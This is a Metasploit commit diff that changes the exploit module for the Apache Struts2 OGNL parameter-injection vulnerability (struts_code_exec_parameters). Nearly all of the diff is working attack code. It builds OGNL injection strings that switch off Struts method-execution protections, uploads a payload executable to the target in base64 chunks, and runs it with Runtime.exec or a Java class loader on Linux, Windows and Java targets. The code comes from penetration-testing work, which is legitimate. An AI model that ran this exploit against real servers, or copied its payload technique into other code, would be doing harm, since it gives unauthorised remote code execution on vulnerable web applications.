Land rapid7#3343, @firefart's new uri encoding for struts_code_exec_parameters

jvazquez-r7 · jvazquez-r7 · commit 6f837715f977 · 2014-05-09T14:37:58.000-05:00
diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb
@@ -27,7 +27,8 @@ def initialize(info = {})
         [
           'Meder Kydyraliev', # Vulnerability Discovery and PoC
           'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
-          'mihi' #ARCH_JAVA support
+          'mihi', #ARCH_JAVA support
+          'Christian Mehlmauer' # Metasploit Module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -66,75 +67,93 @@ def initialize(info = {})
       register_options(
         [
           Opt::RPORT(8080),
-          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
-          OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),
-          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
+          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']),
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
+          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]),
+          OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a&param2=b". Do apply URL encoding to the parameters names and values if needed.', nil]),
     ], self.class)
   end
 
-  def execute_command(cmd, opts = {})
-    inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
-    inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
-    inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
-    inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
-    uri = String.new(datastore['TARGETURI'])
-    uri = normalize_uri(uri)
-    uri.gsub!(/INJECT/,inject) # append the injection string
+  def parameter
+    datastore['PARAMETER']
+  end
+
+  def get_parameter
+    retval = {}
+    return retval unless datastore['GET_PARAMETERS']
+    splitted = datastore['GET_PARAMETERS'].split('&')
+    return retval if splitted.nil? || splitted.empty?
+    splitted.each { |item|
+      name, value = item.split('=')
+      # no check here, value can be nil if parameter is &param
+      decoded_name = name ? Rex::Text::uri_decode(name) : nil
+      decoded_value = value ? Rex::Text::uri_decode(value) : nil
+      retval[decoded_name] = decoded_value
+    }
+    retval
+  end
+
+  def execute_command(cmd)
+    junk = Rex::Text.rand_text_alpha(6)
+    inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
+    inject << "= new java.lang.Boolean(true),#{cmd})('#{junk}')"
+    uri = normalize_uri(datastore['TARGETURI'])
     resp = send_request_cgi({
       'uri'     => uri,
       'version' => '1.1',
       'method'  => 'GET',
+      'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' }.merge(get_parameter)
     })
-    return resp #Used for check function.
+    resp
   end
 
   def exploit
     #Set up generic values.
-    @payload_exe = rand_text_alphanumeric(4+rand(4))
+    payload_exe = rand_text_alphanumeric(4 + rand(4))
     pl_exe = generate_payload_exe
-    append = 'false'
+    append = false
     #Now arch specific...
     case target['Platform']
     when 'linux'
-      @payload_exe = "/tmp/#{@payload_exe}"
-      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
-      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
+      payload_exe = "/tmp/#{payload_exe}"
+      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{payload_exe}\".split(\"_\"))"
+      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{payload_exe}\".split(\"_\"))"
     when 'java'
-      @payload_exe << ".jar"
+      payload_exe << ".jar"
       pl_exe = payload.encoded_jar.pack
-      exec_cmd = ""
+      exec_cmd = ''
       exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
       exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
       exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
       exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
-      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
+      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{payload_exe}').toURI().toURL()}),"
       exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
       exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
       exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
     when 'windows'
-      @payload_exe = "./#{@payload_exe}.exe"
-      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
+      payload_exe = "./#{payload_exe}.exe"
+      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')"
     else
       fail_with(Failure::NoTarget, 'Unsupported target platform!')
     end
 
     #Now with all the arch specific stuff set, perform the upload.
     #109 = length of command string plus the max length of append.
-    sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length
+    sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length
     chunk_length = 2048 - sub_from_chunk
-    chunk_length = ((chunk_length/4).floor)*3
+    chunk_length = ((chunk_length/4).floor) * 3
     while pl_exe.length > chunk_length
-      java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
+      java_upload_part(pl_exe[0,chunk_length], payload_exe, append)
       pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
       append = true
     end
-    java_upload_part(pl_exe,@payload_exe,append)
+    java_upload_part(pl_exe, payload_exe, append)
     execute_command(chmod_cmd) if target['Platform'] == 'linux'
     execute_command(exec_cmd)
-    register_files_for_cleanup(@payload_exe)
+    register_files_for_cleanup(payload_exe)
   end
 
-  def java_upload_part(part, filename, append = 'false')
+  def java_upload_part(part, filename, append = false)
     cmd = ""
     cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
     cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
@@ -151,7 +170,6 @@ def check
     t2 = Time.now
     delta = t2 - t1
 
-
     if response.nil?
       return Exploit::CheckCode::Safe
     elsif delta < sleep_time
